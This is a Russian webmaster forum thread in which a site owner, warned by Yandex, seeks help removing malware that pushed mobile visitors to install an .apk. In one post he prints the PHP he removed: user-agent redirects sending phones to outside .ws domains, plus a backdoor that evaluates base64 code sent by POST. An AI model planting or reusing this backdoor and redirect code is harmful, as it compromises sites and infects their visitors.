Вирус. С мобильных устройств не заходит.

0

Homeprog083

7 апреля 2013, 06:58

790

Привет всем. На днях яндекс прислал мне сообщение с текстом

"На страницах вашего сайта homeprog.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных."

Стал проверять сайт на вирусы и наткнулся на сервис, который показал, что и действительно на сайте завелся "червь"

http://antivirus-alarm.ru/proverka/

мой сайт: homeprog.ru

Прошу помощи, пересмотрел много файлов, но ни в одном не нашел ничего подозрительного.

P.S Еще месяц назад заметил, что когда захожу с телефона, просит установить файл .apk. Но не предал этому значения. Теперь жалею об этом. Вы моя последняя надежда.

427

siv1987

7 апреля 2013, 09:29

#1

Homeprog083:
пересмотрел много файлов, но ни в одном не нашел ничего подозрительного.

Плохо смотрели. Тема уже обсуждалась 100500 раз.

Не разберетесь, пишите в ЛС

84

Braindbrigada

7 апреля 2013, 09:32

#2

.htaccess в самом конце файла посмотрите.

1609

SeVlad

7 апреля 2013, 14:11

#3

Homeprog083:
пересмотрел много файлов,

А закреплённый топик в этом разделе - не судьба?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

133

BlizStrike

8 апреля 2013, 13:22

#4

Braindbrigada:
.htaccess в самом конце файла посмотрите.

+1

И смотрите все php файлы в начале.

SEO.Taxi - Экспертное SEO Продвижение Сайта (https://SEO.Taxi) - подвезу в ТОП Платные консультации по продвижению.

H0

0

Homeprog083

8 апреля 2013, 14:53

#5

Спасибо. Плохой код оказался в 5-и файлах.

Но теперь, сбивается постоянно кодировка на сайте. (например описание сайта, ключевые слова). Я уверен, что это последствия вредоносного кода. Как настроить кодировку?

R

180

Алексей

8 апреля 2013, 14:56

#6

А вы уверенны, что удалили только вирус, а не зацепили нужный код?

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

H0

0

Homeprog083

8 апреля 2013, 15:05

#7

Я удалил вот этот код. Здесь есть что-то нужное?

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yadirect.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://livecountall.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://googlecount.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

K5

209

kgtu5

8 апреля 2013, 16:43

#8

это все в топку

чтобы кодировка не менялась при редактировании файлов используй notepad++ -> win1251

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Вышел новый Яндекс Браузер с YandexGPT и YandexART

Что делать, чтобы попасть в ответы Google Bard